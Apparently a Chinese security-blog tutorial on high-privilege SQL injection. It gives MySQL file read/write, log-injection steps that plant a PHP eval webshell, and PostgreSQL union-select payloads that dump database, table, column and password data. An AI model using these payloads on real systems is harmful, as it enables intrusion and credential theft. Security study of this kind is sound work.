SQL注入-Mysql高权限读写注入

已于 2023-06-29 19:33:38 修改
阅读量310 收藏 1
点赞数
分类专栏: SQL注入漏洞合集 文章标签: sql mysql web安全
于 2023-06-28 07:50:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/131428860
版权

MYSQL-root高权限读写注入

1.读写文件时需要知道文件路径,而有的网站会泄露phpinfo.php文件,在phpinfo.php文件中就可以收集路径信息,如:$_SERVER['SCRIPT_FILENAME']就是当前执行脚本的路径

 

2.浏览器搜索路径

3.还可以根据网站报错信息来获取路径信息

 

 

读取文件

d盘下有一个www.txt文件

使用load_file函数进行读取,成功

 

 

写入文件

根据报错信息获取路径

使用outfile函数写入文件

成功写入后门文件,就可以使用蚁剑等工具进行连接了

 

 

读写注入限制:

secure_file_priv=c:/   只允许在c:/路径进行操作

如果网站的mysql配置文件my.inisecure_file_priv=进行了配置就可能无法在进行读写注入

绕过:注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过

 

 

日志注入

set global slow_query_log=1;      开启MySQL日志记录

set global slow_query_log_file='shell路径';      设置日志记录路径

select '<?php eval($_GET[A]);?>' or SLEEP(1);       执行命令,让日志记录后门代码

 

 

PostgreSQL-高权限注入

测列数:

order by 4

Id=1 union select null,null,null,null

 

测显位:第2,3

利用 ' ' 测试显错位

-1 union select 'null',null,null,null 错误

-1 union select null,'null',null,null 正常

-1 union select null,null,'null',null 正常

-1 union select null,null,null,'null' 错误

 

获取信息:

版本

-1 UNION SELECT null,version(),null,null

用户

-1 UNION SELECT null,current_user,null,null

当前数据库

-1 union select null,current_database(),null,null  

 

 

 

获取数据库名:

-1 union select null,string_agg(datname,','),null,null from pg_database

 

 

 

获取表名:

两种方法:

1、-1 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'

2、-1 union select null,string_agg(relname,','),null,null from pg_stat_user_tables

 

 

 

 

获取列名:

-1 union select null,string_agg(column_name,','),null,null from information_schema.columns where table_name='reg_users'

 

 

 

获取数据:

-1 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

 

 

 

 

 

 

 

 

xiaoheizi安全
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【小迪安全day13】WEB漏洞——SQL注入MYSQL注入
RichUee的博客
12-05 1310
MYSQL注入中首先要明确当前注入权限权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
Mysql注入读写文件
qq_43776408的博客
06-05 525
Mysql注入文件 对于第二种方法 你可以直接打开my.ini配置文件 将该变量的值设置为空 记住 my.ini文件的内容有先后之分的 程序从上到下依次执行 mysql文件 select load_file(“F:\1.txt”); 接下来我们使用Less-1来 第一步肯定要判断几个字段 使用order by id来判断 id=1’ order by 3 --+ 如果正确,但是id为4时就错误了 所以有3个字段 知道有几个字段之后才可以进行联合查询 也就是利用union select 上图unio
SQL注入中的文件读写操作:技术解析与防范策略
最新发布
weixin_43822401的博客
05-24 471
SQL注入攻击是网络世界中的一个严峻问题,它允许攻击者通过构造特殊的SQL语句来操纵数据库。在某些级的SQL注入攻击中,攻击者不仅能获取数据,还能读取和入服务器上的文件。本文将深入探讨SQL注入中的文件读写操作,提供详细的技术解析和实用的防范策略。SQL注入文件读写是指攻击者利用SQL注入漏洞,读取或入服务器上的文件。这种攻击可以用于窃取敏感信息、上传恶意代码或实现持久化控制。
【24】WEB安全学习----MySQL注入-9(读写文件)
尚未佩妥剑 转眼便江湖
09-22 1812
这一章介绍下MySQL数据库访问操作系统的一些可利用的功能。 一、读文件 MySQL提供了允许load data infile命令速地从一个文本文件中读取行,并装入一个表中,看下此命令的说明: load data infile '文件名' into table 表名 测试一下导入,提示“The MySQL server is running with the --secure-file...
sqlmap sql注入
08-22
SQLMap是一款强大的自动化工具,主要用于检测和利用SQL注入漏洞。SQL注入是一种常见的网络安全问题,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,来操纵数据库,获取未经授权的数据访问或执行其他恶意操作...
sql注入的思维导图。
04-19
SQL注入可以分为权限和低权限两种: * 权限:可以读写文件、执行命令、注册表读取、获取shell等。 * 低权限:可以获取数据库记录信息、查询表、列、值等。 回显与盲注 SQL注入可以通过回显和盲注来获取数据库...
三种数据库的 SQL 注入详解
08-03
三种数据库的 SQL 注入详解 ...SQL 注入是一种常见的攻击方式,攻击者可以通过构建特殊的输入来获取更多的数据或者更大的权限。数据库管理员应该注意到 SQL 注入的危险,采取相应的安全措施来防止 SQL 注入攻击。
SQL注入神器
11-05
SQL注入神器,如标题所言,是指用于检测和利用SQL注入漏洞的工具。在这个场景中,我们提及的是Havij 1.10版本,它是一款广为人知的自动化SQL注入工具,尤其在PS 1.1环境中表现出色。SQL注入是一种常见的网络安全问题...
mysql级笔记.zip
11-07
12. **安全**:包括用户权限管理、加密、审计日志和防止SQL注入的最佳实践。 13. **备份与恢复**:包括全量备份、增量备份、热备份和如何恢复数据。 14. **集群与分布式**:如MySQL Cluster和MySQL Fabric等解决...
mysql 注入文件_关于SQL注入文件读写的方法总结
weixin_35866747的博客
01-19 199
前言SQL注入有直接sql注入也有文件读写时的注入了我们这篇文章介绍的是SQL注入中的文件读写这一块的内容,具体的一起来看看。一、MySQL文件常见的读文件,可以用16进制代替字符串select load_file('c:/boot.ini')select load_file(0x633a2f626f6f742e696e69)select load_file('//ecma.io/1.txt')...
小迪教程第五天——Php+mysql注入文件读取,文件导出)
仲夏
10-16 1464
1、Mysql数据库最权限用户:root注入点不同的权限用户是取决于连接数据库时的用户2、小实验:测试mysql不同用户文件操作权限测试root的文件操作权限 Root用户权限可以执行sql语句对文件进行读写操作 有读取权限: 有权限: 测试test普通用户的文件操作权限 Test普通用户权限不可以执行sql语句对文件进行读写操作3、符号问题,编码问题, 路径问题符号问题: 使
MySQL注入权限注入
xiao_he0123的博客
03-17 1198
MySQL注入权限注入前言二、权限注入1.什么是权限注入2.跨库查询思路1.查看用户名2.获取所有的数据库名3.获取指定数据库名下的表名信息4.获取指定damicms下的表名admin下的列名信息4.获取damicms下的admin中的数据 前言 在数据库中有database,schema,table,user,行,列容易被混淆之间的关系 他们之间的关系可以这样理解: database是一个家,schema就是这个家里面的各个房间,table就是各个房间里的床,行列就是床上面的东西,user就是指
SQL权限注入(附实例)-跨库注入-文件读写操作-魔术引号-防注入方法
ran的博客
01-13 542
此次要进行跨库注入的目标是“Pikachu漏洞联系平台”,而上一步获取到的所有数据库里可以发现有一个数据库名称为“pikachu”,不难判断出此数据库即为跨库注入的目标的数据库。比如下面的数据库A是“root用户”,就可以对相关的网站B、网站C进行跨库注入,但是想要实现跨库注入,首先就需要知道数据库B、数据库C的数据库名称。进行上述操作时,文件路径里的斜杠最好使用“/”或者“\\”,而不是使用默认的“\”,因为在很多编程语言中“\n”代表换行的意思,可能因此会发生错误。
SQL注入-Mysql注入读写文件
qq_25899635的博客
05-22 7032
Mysql注入文件 mysql数据库在渗透测试过程中能够使用的功能还是比较多的,出了读取数据之外,还可以进行读写(但前提是权限足够)。 读文件前提: 1、用户权限足够,尽量具有root权限。 2、secure_file_priv不为NULL Mysql文件读写函数 举例:select load_file(’/etc/hosts’) 上面的例子是有条件限制的: 1、必须有权限读取并且文件必须完...
MySQL 注入读写文件
白菜执笔人的博客
03-01 1266
Web安全攻防 学习笔记 一、MySQL 注入读写文件         MySQL 数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行 对文件进行读写(前提是权限足够) 1.1、读取前提 用户权限足够,尽量具有 root 权限 secure_file_priv 不为 null(默认是 null) 要使用的话,就要修改...
mysql 报错注入文件_MySQL注入总结
weixin_33497800的博客
01-26 232
目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insert、update)0x02 mysql报错注入0x03 mysql一般盲注0x04 mysql时间盲注0x05 mysql其他注入技巧0x06 mysql数据库版本特性正文:0x00 mysql一般注入(select)1.注释符#/*--2.过滤空格注入使用/**/或()或+代替空格%0c = form fe...
SQL注入 | mysql文件 | 读取文件
JacobTsang的博客
10-11 2932
mysql 新版本下secure-file-priv字段 : secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。 ure_file_priv的值为null ,表示限制mysqld 不允许导入|导出。 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生...
sqli-labs注入靶场搭建
09-25
sqli-labs是一个用来学习sql注入的环境。搭建sqli-labs注入靶场可以按照以下步骤进行操作: 1. 准备软件:首先,你需要准备一个支持PHP和MySQL的服务器环境,例如Apache服务器、PHP解释器和MySQL数据库。 2. 下载...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值